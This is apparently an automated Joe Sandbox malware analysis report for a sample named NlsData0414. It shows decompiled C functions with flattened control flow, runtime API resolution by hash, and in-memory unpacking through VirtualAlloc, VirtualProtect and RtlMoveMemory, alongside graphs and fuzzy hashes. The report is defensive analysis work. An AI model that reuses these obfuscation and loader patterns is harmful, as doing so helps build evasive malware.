                                                        control_flow_graph 457 2b30a0-2b30b6 458 2b30ba-2b30bf 457->458 459 2b30c0-2b30c5 458->459 460 2b30cb 459->460 461 2b3201-2b3206 459->461 462 2b31ed-2b31f1 460->462 463 2b30d1-2b30d6 460->463 464 2b3208-2b320d 461->464 465 2b3245-2b324c 461->465 466 2b31f7-2b31fc 462->466 467 2b32f6-2b3300 462->467 468 2b31da-2b31e8 463->468 469 2b30dc-2b30e1 463->469 470 2b32ab-2b32b3 464->470 471 2b3213-2b3218 464->471 472 2b3269-2b3274 465->472 473 2b324e-2b3264 call 2b3f00 call 2b3e60 465->473 466->459 468->459 474 2b31a0-2b31a8 469->474 475 2b30e7-2b30ec 469->475 478 2b32d3-2b32f3 470->478 479 2b32b5-2b32cd call 2b3f00 call 2b3e60 470->479 476 2b321a-2b3228 call 2b3d00 471->476 477 2b322d-2b3232 471->477 490 2b3291-2b329f RtlAllocateHeap 472->490 491 2b3276-2b328c call 2b3f00 call 2b3e60 472->491 473->472 484 2b31aa-2b31c2 call 2b3f00 call 2b3e60 474->484 485 2b31c8-2b31d5 474->485 475->477 482 2b30f2-2b319b 475->482 476->458 477->459 486 2b3238-2b3242 477->486 478->467 479->478 482->458 484->485 485->458 490->467 498 2b32a1-2b32a6 490->498 491->490 498->458
                                                        C-Code - Quality: 71%
                                                        			E002B30A0() {
                                                        				void* __ebx;
                                                        				void* __ecx;
                                                        				void* __ebp;
                                                        				void* _t61;
                                                        				intOrPtr* _t62;
                                                        				void* _t65;
                                                        				intOrPtr _t93;
                                                        				intOrPtr* _t95;
                                                        				intOrPtr _t107;
                                                        				intOrPtr* _t116;
                                                        				void* _t127;
                                                        				void* _t128;
                                                        				intOrPtr _t129;
                                                        				signed int _t134;
                                                        				void* _t135;
                                                        				void* _t136;
                                                        
                                                        				_t93 =  *((intOrPtr*)(_t135 + 0xc));
                                                        				_t61 = 0x11f367c2;
                                                        				_t134 =  *(_t135 + 0x10);
                                                        				_t129 =  *((intOrPtr*)(_t135 + 0x14));
                                                        				_t127 =  *(_t135 + 0x18);
                                                        				while(1) {
                                                        					L1:
                                                        					do {
                                                        						while(1) {
                                                        							L2:
                                                        							_t136 = _t61 - 0x12466c01;
                                                        							if(_t136 > 0) {
                                                        								break;
                                                        							}
                                                        							if(_t136 == 0) {
                                                        								if(_t93 !=  *(_t135 + 0x18)) {
                                                        									L29:
                                                        									return 1;
                                                        								} else {
                                                        									_t61 = 0x2f21cdd2;
                                                        									continue;
                                                        								}
                                                        							} else {
                                                        								if(_t61 == 0x7a26146) {
                                                        									_t61 =  ==  ? 0x2f21cdd2 : 0x12466c01;
                                                        									continue;
                                                        								} else {
                                                        									if(_t61 == 0x8928514) {
                                                        										_t95 =  *0x2be1cc;
                                                        										if(_t95 == 0) {
                                                        											_t95 = E002B3E60(_t93, E002B3F00(0x55ab7d30), 0x815a9da3, _t134);
                                                        											 *0x2be1cc = _t95;
                                                        										}
                                                        										_t129 =  *_t95(_t134 + 0x2c);
                                                        										_t61 = 0x39d78901;
                                                        										while(1) {
                                                        											L1:
                                                        											goto L2;
                                                        										}
                                                        									} else {
                                                        										if(_t61 != 0x11f367c2) {
                                                        											goto L18;
                                                        										} else {
                                                        											 *(_t135 + 0x18) = 0x2e7c;
                                                        											 *(_t135 + 0x18) = 0x3e0f83e1 *  *(_t135 + 0x18) >> 0x20 >> 4;
                                                        											 *(_t135 + 0x18) =  *(_t135 + 0x18) >> 7;
                                                        											 *(_t135 + 0x18) = 0x2f149903 *  *(_t135 + 0x18) >> 0x20 >> 4;
                                                        											 *(_t135 + 0x18) =  *(_t135 + 0x18) + 0xffff1475;
                                                        											 *(_t135 + 0x18) =  *(_t135 + 0x18) * 0x15;
                                                        											 *(_t135 + 0x18) =  *(_t135 + 0x18) >> 2;
                                                        											 *(_t135 + 0x18) = 0x22b63cbf *  *(_t135 + 0x18) >> 0x20 >> 4;
                                                        											 *(_t135 + 0x18) =  *(_t135 + 0x18) ^ 0x8ee7705c;
                                                        											 *(_t135 + 0x10) = 0xa461;
                                                        											 *(_t135 + 0x10) =  *(_t135 + 0x10) << 0xe;
                                                        											 *(_t135 + 0x10) =  *(_t135 + 0x10) * 8 -  *(_t135 + 0x10) << 2;
                                                        											_t61 = 0x8928514;
                                                        											 *(_t135 + 0x10) = 0x51eb851f *  *(_t135 + 0x10) >> 0x20 >> 3;
                                                        											 *(_t135 + 0x10) =  *(_t135 + 0x10) + 0xffffb6ab;
                                                        											 *(_t135 + 0x10) =  *(_t135 + 0x10) ^ 0x88f30986;
                                                        											while(1) {
                                                        												L1:
                                                        												goto L2;
                                                        											}
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        							L30:
                                                        						}
                                                        						if(_t61 == 0x2f21cdd2) {
                                                        							_t62 =  *0x2be494;
                                                        							if(_t62 == 0) {
                                                        								_t62 = E002B3E60(_t93, E002B3F00(0x9bab0b12), 0x7facde30, _t134);
                                                        								 *0x2be494 = _t62;
                                                        							}
                                                        							_t128 =  *_t62();
                                                        							if( *0x2bdd18 == 0) {
                                                        								 *0x2bdd18 = E002B3E60(_t93, E002B3F00(0x9bab0b12), 0x9ff0609c, _t134);
                                                        							}
                                                        							_t65 = RtlAllocateHeap(_t128, 8, 0x24c); // executed
                                                        							_t127 = _t65;
                                                        							if(_t127 == 0) {
                                                        								goto L29;
                                                        							} else {
                                                        								_t61 = 0x35eaa088;
                                                        								goto L1;
                                                        							}
                                                        						} else {
                                                        							if(_t61 == 0x35eaa088) {
                                                        								_t116 =  *0x2be43c;
                                                        								if(_t116 == 0) {
                                                        									_t116 = E002B3E60(_t93, E002B3F00(0x9bab0b12), 0x2df4d385, _t134);
                                                        									 *0x2be43c = _t116;
                                                        								}
                                                        								 *_t116(_t127 + 0x3c, _t134 + 0x2c, (_t129 - _t134 - 0x2c >> 1) + 1);
                                                        								_t107 =  *((intOrPtr*)(_t135 + 0x1c));
                                                        								 *(_t127 + 0x2c) =  *(_t107 + 0x1c);
                                                        								 *((intOrPtr*)(_t107 + 0xc)) =  *((intOrPtr*)(_t107 + 0xc)) + 1;
                                                        								 *(_t107 + 0x1c) = _t127;
                                                        								goto L29;
                                                        							} else {
                                                        								if(_t61 != 0x39d78901) {
                                                        									goto L18;
                                                        								} else {
                                                        									_t93 = E002B3D00(_t129);
                                                        									_t61 = 0x7a26146;
                                                        									while(1) {
                                                        										L1:
                                                        										goto L2;
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						goto L30;
                                                        						L18:
                                                        					} while (_t61 != 0x100ad7b4);
                                                        					return 1;
                                                        					goto L30;
                                                        				}
                                                        			}



















                                                        0x002b30a2
                                                        0x002b30a6
                                                        0x002b30ac
                                                        0x002b30b1
                                                        0x002b30b6
                                                        0x002b30ba
                                                        0x002b30ba
                                                        0x002b30c0
                                                        0x002b30c0
                                                        0x002b30c0
                                                        0x002b30c0
                                                        0x002b30c5
                                                        0x00000000
                                                        0x00000000
                                                        0x002b30cb
                                                        0x002b31f1
                                                        0x002b32f9
                                                        0x002b3300
                                                        0x002b31f7
                                                        0x002b31f7
                                                        0x00000000
                                                        0x002b31f7
                                                        0x002b30d1
                                                        0x002b30d6
                                                        0x002b31e5
                                                        0x00000000
                                                        0x002b30dc
                                                        0x002b30e1
                                                        0x002b31a0
                                                        0x002b31a8
                                                        0x002b31c0
                                                        0x002b31c2
                                                        0x002b31c2
                                                        0x002b31ce
                                                        0x002b31d0
                                                        0x002b30ba
                                                        0x002b30ba
                                                        0x00000000
                                                        0x002b30ba
                                                        0x002b30e7
                                                        0x002b30ec
                                                        0x00000000
                                                        0x002b30f2
                                                        0x002b30f2
                                                        0x002b310d
                                                        0x002b3111
                                                        0x002b311f
                                                        0x002b3123
                                                        0x002b3130
                                                        0x002b3139
                                                        0x002b3147
                                                        0x002b314b
                                                        0x002b3153
                                                        0x002b315b
                                                        0x002b3175
                                                        0x002b317f
                                                        0x002b3187
                                                        0x002b318b
                                                        0x002b3193
                                                        0x002b30ba
                                                        0x002b30ba
                                                        0x00000000
                                                        0x002b30ba
                                                        0x002b30ba
                                                        0x002b30ec
                                                        0x002b30e1
                                                        0x002b30d6
                                                        0x00000000
                                                        0x002b30cb
                                                        0x002b3206
                                                        0x002b3245
                                                        0x002b324c
                                                        0x002b325f
                                                        0x002b3264
                                                        0x002b3264
                                                        0x002b326b
                                                        0x002b3274
                                                        0x002b328c
                                                        0x002b328c
                                                        0x002b3299
                                                        0x002b329b
                                                        0x002b329f
                                                        0x00000000
                                                        0x002b32a1
                                                        0x002b32a1
                                                        0x00000000
                                                        0x002b32a1
                                                        0x002b3208
                                                        0x002b320d
                                                        0x002b32ab
                                                        0x002b32b3
                                                        0x002b32cb
                                                        0x002b32cd
                                                        0x002b32cd
                                                        0x002b32e4
                                                        0x002b32e6
                                                        0x002b32ed
                                                        0x002b32f0
                                                        0x002b32f3
                                                        0x00000000
                                                        0x002b3213
                                                        0x002b3218
                                                        0x00000000
                                                        0x002b321a
                                                        0x002b3221
                                                        0x002b3223
                                                        0x002b30ba
                                                        0x002b30ba
                                                        0x00000000
                                                        0x002b30ba
                                                        0x002b30ba
                                                        0x002b3218
                                                        0x002b320d
                                                        0x00000000
                                                        0x002b322d
                                                        0x002b322d
                                                        0x002b3242
                                                        0x00000000
                                                        0x002b3242

                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00000000,00000008,0000024C), ref: 002B3299
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2275531038.00000000002B1000.00000020.00000001.sdmp, Offset: 002B0000, based on PE: true
                                                        • Associated: 0000000B.00000002.2275502828.00000000002B0000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.2275638046.00000000002BD000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.2275727314.00000000002BF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_2b0000_NlsData0414.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID: |.
                                                        • API String ID: 1279760036-512043466
                                                        • Opcode ID: c2dd14830fb8ee3c3bcf83625f9775e74740e1ba9335b7b6a56542b70b0e9169
                                                        • Instruction ID: da8e562e00d438afc7d3a9cee7465bb9da0bdb79b3ce8dd49811deab2556264b
                                                        • Opcode Fuzzy Hash: c2dd14830fb8ee3c3bcf83625f9775e74740e1ba9335b7b6a56542b70b0e9169
                                                        • Instruction Fuzzy Hash: 6E51B3717283028BCB18DF6C94845AE7BE6EBD4384F20491EF451CB351DB71DE598B92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 508 2a0580-2a05be call 2a0ed0 511 2a05d2-2a05da 508->511 512 2a05c0-2a05cf 508->512 513 2a05e0-2a05e3 511->513 514 2a06e7-2a06ef 511->514 513->514 515 2a05e9-2a05eb 513->515 515->514 516 2a05f1-2a05fc 515->516 516->514 518 2a0602-2a0607 516->518 519 2a06d8-2a06e4 518->519 520 2a060d-2a0629 call 2a1140 RtlMoveMemory 518->520 523 2a062b-2a0630 520->523 524 2a0654-2a0659 520->524 525 2a0632-2a0641 523->525 526 2a0643-2a0652 523->526 527 2a065b-2a066a 524->527 528 2a066c-2a0678 524->528 529 2a0679-2a0699 call 2a1140 525->529 526->529 527->529 528->529 529->514 532 2a069b-2a06a3 VirtualProtect 529->532 533 2a06c6-2a06d5 532->533 534 2a06a5-2a06a8 532->534 534->514 535 2a06aa-2a06ad 534->535 535->514 536 2a06af-2a06b1 535->536 536->520 537 2a06b7-2a06c3 536->537
                                                        APIs
                                                          • Part of subcall function 002A0FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 002A0F08
                                                          • Part of subcall function 002A0FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 002A0F3E
                                                          • Part of subcall function 002A0FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 002A0F7F
                                                        • RtlMoveMemory.NTDLL(00000000,-00000018,00000028), ref: 002A061B
                                                        • VirtualProtect.KERNEL32(00000000,-00000018,?,00000000,00000000,00000000,-00000018,00000028,?,?,?,00000000,00000000,?,00000000), ref: 002A069C
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2275450114.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_2a0000_NlsData0414.jbxd
                                                        Similarity
                                                        • API ID: MemoryMove$ProtectVirtual
                                                        • String ID:
                                                        • API String ID: 4043890290-0
                                                        • Opcode ID: b94b9ae67b6adb9e0137934aeccaac81b37d054c99ee4087dee3bfd6cde587a0
                                                        • Instruction ID: 52f8e1f765f27da408a9d8c41f945c59c3bbfe65e4da4f93cb424fa442033259
                                                        • Opcode Fuzzy Hash: b94b9ae67b6adb9e0137934aeccaac81b37d054c99ee4087dee3bfd6cde587a0
                                                        • Instruction Fuzzy Hash: C13137B367430257E3249A65DCC5BEBA3C8D7D3B58F08043AF905C2240D92ED474C665
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 538 2b5ce0-2b5cec call 2b65e0 541 2b5d09-2b5d0d ExitProcess 538->541 542 2b5cee-2b5d04 call 2b3f00 call 2b3e60 538->542 542->541
                                                        C-Code - Quality: 100%
                                                        			_entry_() {
                                                        				void* _t5;
                                                        				void* _t9;
                                                        
                                                        				E002B65E0();
                                                        				if( *0x2bddb8 == 0) {
                                                        					 *0x2bddb8 = E002B3E60(_t5, E002B3F00(0x9bab0b12), 0x89f3d704, _t9);
                                                        				}
                                                        				ExitProcess(0);
                                                        			}





                                                        0x002b5ce0
                                                        0x002b5cec
                                                        0x002b5d04
                                                        0x002b5d04
                                                        0x002b5d0b

                                                        APIs
                                                        • ExitProcess.KERNELBASE(00000000), ref: 002B5D0B
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2275531038.00000000002B1000.00000020.00000001.sdmp, Offset: 002B0000, based on PE: true
                                                        • Associated: 0000000B.00000002.2275502828.00000000002B0000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.2275638046.00000000002BD000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.2275727314.00000000002BF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_2b0000_NlsData0414.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExitProcess
                                                        • String ID:
                                                        • API String ID: 621844428-0
                                                        • Opcode ID: 907e43d137e57ad1b770a1f3fb88c1e690b60d6fc813df40fe5ac4449af34197
                                                        • Instruction ID: 5ac66e62420f898e48a52253eda5aba40b11ba7ab41e909bf056437e04b18390
                                                        • Opcode Fuzzy Hash: 907e43d137e57ad1b770a1f3fb88c1e690b60d6fc813df40fe5ac4449af34197
                                                        • Instruction Fuzzy Hash: 02D0C92172421646DA58ABB568597EA259A8FA0788F104119E051CB296FE34C930AB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 547 2a0ad0-2a0b31 call 2a0ed0 550 2a0b33-2a0b42 547->550 551 2a0b47-2a0b4d 547->551 552 2a0d40 550->552 553 2a0b5f-2a0b7b 551->553 554 2a0b4f-2a0b54 551->554 556 2a0b7d-2a0b8e 553->556 557 2a0b90 553->557 554->553 558 2a0b96-2a0b9c 556->558 557->558 560 2a0bae-2a0bca 558->560 561 2a0b9e-2a0ba3 558->561 563 2a0bcc-2a0bd4 560->563 564 2a0bd7-2a0c21 VirtualAlloc 560->564 561->560 563->564 568 2a0d1a-2a0d24 564->568 569 2a0c27-2a0c2e 564->569 568->552 570 2a0c30-2a0c3f 569->570 571 2a0c44-2a0c4b 569->571 570->552 572 2a0c5d-2a0c79 571->572 573 2a0c4d-2a0c52 571->573 575 2a0c7b-2a0c83 572->575 576 2a0c86-2a0c8d 572->576 573->572 575->576 577 2a0c9f-2a0cbb 576->577 578 2a0c8f-2a0c94 576->578 580 2a0cc8-2a0cfa VirtualAlloc 577->580 581 2a0cbd-2a0cc5 577->581 578->577 584 2a0d02-2a0d07 580->584 581->580 584->568 585 2a0d09-2a0d18 584->585 585->552
                                                        APIs
                                                          • Part of subcall function 002A0FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 002A0F08
                                                          • Part of subcall function 002A0FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 002A0F3E
                                                          • Part of subcall function 002A0FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 002A0F7F
                                                        • VirtualAlloc.KERNEL32(?,?,00000000), ref: 002A0BFF
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2275450114.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_2a0000_NlsData0414.jbxd
                                                        Similarity
                                                        • API ID: MemoryMove$AllocVirtual
                                                        • String ID:
                                                        • API String ID: 1654584625-0
                                                        • Opcode ID: 33a83c292423e0fbe2e532dbc4518730eee9e5d53c86213deb289c7390d0b434
                                                        • Instruction ID: dd2a57435a77e24343d883cdef0639341ddf099e81b5ad2777de78dbb8c8c5e8
                                                        • Opcode Fuzzy Hash: 33a83c292423e0fbe2e532dbc4518730eee9e5d53c86213deb289c7390d0b434
                                                        • Instruction Fuzzy Hash: 78511370A40218ABDB208F54CE86FEAB7B8EF55701F004095FA08B7190DBB89D85CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 699 2b80a0-2b815b 700 2b8163-2b8168 699->700 701 2b8170-2b8175 700->701 702 2b817b 701->702 703 2b8338-2b833d 701->703 704 2b8181-2b8186 702->704 705 2b8287-2b829b call 2b34c0 702->705 706 2b836f-2b8377 703->706 707 2b833f-2b8344 703->707 711 2b818c-2b8191 704->711 712 2b8252-2b8259 704->712 728 2b82bb-2b82e3 705->728 729 2b829d-2b82b5 call 2b3f00 call 2b3e60 705->729 709 2b8379-2b8391 call 2b3f00 call 2b3e60 706->709 710 2b8397-2b83bb CreateFileW 706->710 713 2b8346-2b834b 707->713 714 2b8365-2b836a 707->714 709->710 719 2b83ee-2b83fa 710->719 720 2b83bd-2b83c2 710->720 723 2b81e3-2b821a 711->723 724 2b8193-2b8198 711->724 721 2b825b-2b8271 call 2b3f00 call 2b3e60 712->721 722 2b8276-2b8282 712->722 715 2b834d-2b8352 713->715 716 2b83c7-2b83ce 713->716 714->701 715->701 725 2b8358-2b8364 715->725 732 2b83eb 716->732 733 2b83d0-2b83e6 call 2b3f00 call 2b3e60 716->733 720->701 721->722 722->701 726 2b821c-2b8232 call 2b3f00 call 2b3e60 723->726 727 2b8237-2b824d 723->727 724->715 734 2b819e-2b81e1 call 2bb6e0 724->734 726->727 727->701 752 2b8300-2b830b 728->752 753 2b82e5-2b82fb call 2b3f00 call 2b3e60 728->753 729->728 732->719 733->732 734->701 763 2b8328-2b8333 752->763 764 2b830d-2b8323 call 2b3f00 call 2b3e60 752->764 753->752 763->700 764->763
                                                        C-Code - Quality: 66%
                                                        			E002B80A0(signed int __edx) {
                                                        				short _v524;
                                                        				struct _SECURITY_ATTRIBUTES* _v532;
                                                        				intOrPtr _v536;
                                                        				intOrPtr _v540;
                                                        				intOrPtr _v544;
                                                        				intOrPtr _v548;
                                                        				intOrPtr _v552;
                                                        				intOrPtr _v556;
                                                        				intOrPtr _v560;
                                                        				char _v564;
                                                        				intOrPtr _v568;
                                                        				char _v572;
                                                        				struct _SECURITY_ATTRIBUTES* _v576;
                                                        				intOrPtr _v580;
                                                        				signed int _v584;
                                                        				signed int _v588;
                                                        				signed int _v592;
                                                        				signed int _v596;
                                                        				void* __ebx;
                                                        				void* __ebp;
                                                        				void* _t58;
                                                        				void* _t64;
                                                        				void* _t66;
                                                        				intOrPtr* _t68;
                                                        				void* _t72;
                                                        				intOrPtr* _t77;
                                                        				intOrPtr* _t79;
                                                        				void* _t81;
                                                        				void* _t82;
                                                        				intOrPtr* _t85;
                                                        				void* _t87;
                                                        				intOrPtr _t88;
                                                        				intOrPtr* _t89;
                                                        				void* _t91;
                                                        				void* _t95;
                                                        				intOrPtr _t100;
                                                        				char _t104;
                                                        				signed int _t121;
                                                        				void* _t124;
                                                        				void* _t126;
                                                        				void* _t127;
                                                        				signed int* _t128;
                                                        				void* _t130;
                                                        
                                                        				_t121 = __edx;
                                                        				_t128 =  &_v596;
                                                        				_v584 = 0x9318;
                                                        				_t58 = 0x343bfd89;
                                                        				_v584 = _v584 ^ 0xde90c338;
                                                        				_v584 = _v584 ^ 0xde905120;
                                                        				_v596 = 0x7d19;
                                                        				_v596 = _v596 << 9;
                                                        				_v596 = _v596 >> 0xe;
                                                        				_v596 = _v596 + 0xffff07e5;
                                                        				_v596 = _v596 | 0x8aea6eef;
                                                        				_v596 = _v596 + 0xd867;
                                                        				_v596 = _v596 + 0x9c41;
                                                        				_v596 = _v596 + 0x3de0;
                                                        				_v596 = _v596 + 0x218b;
                                                        				_v596 = _v596 ^ 0x00014403;
                                                        				_v592 = 0x2591;
                                                        				_t127 = _v584;
                                                        				_t95 = 0;
                                                        				_v592 = _v592 * 0x7d;
                                                        				_v592 = _v592 + 0x8d68;
                                                        				_v592 = _v592 + 0xffff8911;
                                                        				_v592 = _v592 * 0x6a;
                                                        				_v592 = _v592 + 0xffff93d5;
                                                        				_v592 = _v592 ^ 0x07a13cd2;
                                                        				_v588 = 0x789;
                                                        				_v588 = _v588 >> 1;
                                                        				_v588 = _v588 ^ 0xaee58af2;
                                                        				_v588 = _v588 ^ 0xaee58936;
                                                        				while(1) {
                                                        					L1:
                                                        					goto L2;
                                                        					do {
                                                        						while(1) {
                                                        							L2:
                                                        							_t130 = _t58 - 0xea5411f;
                                                        							if(_t130 > 0) {
                                                        								break;
                                                        							}
                                                        							if(_t130 == 0) {
                                                        								_t72 = E002B34C0(0x2bd970);
                                                        								_t121 =  *0x2be158;
                                                        								_t126 = _t72;
                                                        								if(_t121 == 0) {
                                                        									_t121 = E002B3E60(_t95, E002B3F00(0xc6fbcd74), 0xba71dd03, _t127);
                                                        									 *0x2be158 = _t121;
                                                        								}
                                                        								_t100 =  *0x2be54c; // 0x5be1f8
                                                        								_t50 = _t100 + 0x260; // 0x5be458
                                                        								_t51 = _t100 + 0x18; // 0x5be210
                                                        								 *_t121( &_v524, 0x104, _t126, _t51, _t50);
                                                        								_t77 =  *0x2be494;
                                                        								_t128 =  &(_t128[5]);
                                                        								if(_t77 == 0) {
                                                        									_t82 = E002B3F00(0x9bab0b12);
                                                        									_t121 = 0x7facde30;
                                                        									_t77 = E002B3E60(_t95, _t82, 0x7facde30, _t127);
                                                        									 *0x2be494 = _t77;
                                                        								}
                                                        								_t124 =  *_t77();
                                                        								_t79 =  *0x2bdf30;
                                                        								if(_t79 == 0) {
                                                        									_t81 = E002B3F00(0x9bab0b12);
                                                        									_t121 = 0x5010a54d;
                                                        									_t79 = E002B3E60(_t95, _t81, 0x5010a54d, _t127);
                                                        									 *0x2bdf30 = _t79;
                                                        								}
                                                        								 *_t79(_t124, 0, _t126);
                                                        								_t58 = 0x2c2d24c8;
                                                        								goto L1;
                                                        							} else {
                                                        								if(_t58 == 0x2f64d8b) {
                                                        									_t85 =  *0x2be1d4;
                                                        									if(_t85 == 0) {
                                                        										_t87 = E002B3F00(0x9bab0b12);
                                                        										_t121 = 0xa229df38;
                                                        										_t85 = E002B3E60(_t95, _t87, 0xa229df38, _t127);
                                                        										 *0x2be1d4 = _t85;
                                                        									}
                                                        									 *_t85( &_v572);
                                                        									_t58 = 0xc5e088d;
                                                        									continue;
                                                        								} else {
                                                        									if(_t58 == 0x6f65414) {
                                                        										_t88 = _v568;
                                                        										_t104 = _v572;
                                                        										_v560 = _t88;
                                                        										_v552 = _t88;
                                                        										_v544 = _t88;
                                                        										_v536 = _t88;
                                                        										_t89 =  *0x2bdee4;
                                                        										_v564 = _t104;
                                                        										_v556 = _t104;
                                                        										_v548 = _t104;
                                                        										_v540 = _t104;
                                                        										_v532 = 0;
                                                        										if(_t89 == 0) {
                                                        											_t91 = E002B3F00(0x9bab0b12);
                                                        											_t121 = 0x4bf45878;
                                                        											_t89 = E002B3E60(_t95, _t91, 0x4bf45878, _t127);
                                                        											 *0x2bdee4 = _t89;
                                                        										}
                                                        										 *_t89(_t127, 0,  &_v564, 0x28);
                                                        										_t58 = 0x3557bd8c;
                                                        										_t95 =  !=  ? 1 : _t95;
                                                        										continue;
                                                        									} else {
                                                        										if(_t58 != 0xc5e088d) {
                                                        											goto L24;
                                                        										} else {
                                                        											_v580 = 0xa8c00;
                                                        											_v576 = 0;
                                                        											_v596 = E002BB6E0(_v580, _v576, 0x989680, 0);
                                                        											_v592 = _t121;
                                                        											_v588 = _v588 - _v596;
                                                        											_t58 = 0xea5411f;
                                                        											asm("sbb [esp+0x2c], ecx");
                                                        											continue;
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        							L35:
                                                        						}
                                                        						if(_t58 == 0x2c2d24c8) {
                                                        							if( *0x2bde04 == 0) {
                                                        								_t66 = E002B3F00(0x9bab0b12);
                                                        								_t121 = 0xb66d748a;
                                                        								 *0x2bde04 = E002B3E60(_t95, _t66, 0xb66d748a, _t127);
                                                        							}
                                                        							_t64 = CreateFileW( &_v524, _v584, _v596, 0, _v592, _v588, 0); // executed
                                                        							_t127 = _t64;
                                                        							if(_t127 == 0xffffffff) {
                                                        								goto L34;
                                                        							} else {
                                                        								_t58 = 0x6f65414;
                                                        								goto L2;
                                                        							}
                                                        						} else {
                                                        							if(_t58 == 0x343bfd89) {
                                                        								_t58 = 0x2f64d8b;
                                                        								goto L2;
                                                        							} else {
                                                        								if(_t58 == 0x3557bd8c) {
                                                        									_t68 =  *0x2bde3c;
                                                        									if(_t68 == 0) {
                                                        										_t68 = E002B3E60(_t95, E002B3F00(0x9bab0b12), 0x20de7595, _t127);
                                                        										 *0x2bde3c = _t68;
                                                        									}
                                                        									 *_t68(_t127);
                                                        									L34:
                                                        									return _t95;
                                                        								} else {
                                                        									goto L24;
                                                        								}
                                                        							}
                                                        						}
                                                        						goto L35;
                                                        						L24:
                                                        					} while (_t58 != 0xcfe8e);
                                                        					return _t95;
                                                        					goto L35;
                                                        				}
                                                        			}














































                                                        0x002b80a0
                                                        0x002b80a0
                                                        0x002b80a6
                                                        0x002b80ae
                                                        0x002b80b3
                                                        0x002b80bb
                                                        0x002b80c3
                                                        0x002b80ca
                                                        0x002b80ce
                                                        0x002b80d2
                                                        0x002b80d9
                                                        0x002b80e0
                                                        0x002b80e7
                                                        0x002b80ee
                                                        0x002b80f5
                                                        0x002b80fc
                                                        0x002b8103
                                                        0x002b8112
                                                        0x002b8116
                                                        0x002b8119
                                                        0x002b811d
                                                        0x002b8125
                                                        0x002b8133
                                                        0x002b8137
                                                        0x002b813f
                                                        0x002b8147
                                                        0x002b814f
                                                        0x002b8153
                                                        0x002b815b
                                                        0x002b8163
                                                        0x002b8163
                                                        0x002b8168
                                                        0x002b8170
                                                        0x002b8170
                                                        0x002b8170
                                                        0x002b8170
                                                        0x002b8175
                                                        0x00000000
                                                        0x00000000
                                                        0x002b817b
                                                        0x002b828c
                                                        0x002b8291
                                                        0x002b8297
                                                        0x002b829b
                                                        0x002b82b3
                                                        0x002b82b5
                                                        0x002b82b5
                                                        0x002b82bb
                                                        0x002b82c1
                                                        0x002b82c8
                                                        0x002b82d7
                                                        0x002b82d9
                                                        0x002b82de
                                                        0x002b82e3
                                                        0x002b82ea
                                                        0x002b82ef
                                                        0x002b82f6
                                                        0x002b82fb
                                                        0x002b82fb
                                                        0x002b8302
                                                        0x002b8304
                                                        0x002b830b
                                                        0x002b8312
                                                        0x002b8317
                                                        0x002b831e
                                                        0x002b8323
                                                        0x002b8323
                                                        0x002b832c
                                                        0x002b832e
                                                        0x00000000
                                                        0x002b8181
                                                        0x002b8186
                                                        0x002b8252
                                                        0x002b8259
                                                        0x002b8260
                                                        0x002b8265
                                                        0x002b826c
                                                        0x002b8271
                                                        0x002b8271
                                                        0x002b827b
                                                        0x002b827d
                                                        0x00000000
                                                        0x002b818c
                                                        0x002b8191
                                                        0x002b81e3
                                                        0x002b81e7
                                                        0x002b81eb
                                                        0x002b81ef
                                                        0x002b81f3
                                                        0x002b81f7
                                                        0x002b81fb
                                                        0x002b8200
                                                        0x002b8204
                                                        0x002b8208
                                                        0x002b820c
                                                        0x002b8210
                                                        0x002b821a
                                                        0x002b8221
                                                        0x002b8226
                                                        0x002b822d
                                                        0x002b8232
                                                        0x002b8232
                                                        0x002b8241
                                                        0x002b8245
                                                        0x002b824a
                                                        0x00000000
                                                        0x002b8193
                                                        0x002b8198
                                                        0x00000000
                                                        0x002b819e
                                                        0x002b81a0
                                                        0x002b81a8
                                                        0x002b81c4
                                                        0x002b81c8
                                                        0x002b81d4
                                                        0x002b81d8
                                                        0x002b81dd
                                                        0x00000000
                                                        0x002b81dd
                                                        0x002b8198
                                                        0x002b8191
                                                        0x002b8186
                                                        0x00000000
                                                        0x002b817b
                                                        0x002b833d
                                                        0x002b8377
                                                        0x002b837e
                                                        0x002b8383
                                                        0x002b8391
                                                        0x002b8391
                                                        0x002b83b4
                                                        0x002b83b6
                                                        0x002b83bb
                                                        0x00000000
                                                        0x002b83bd
                                                        0x002b83bd
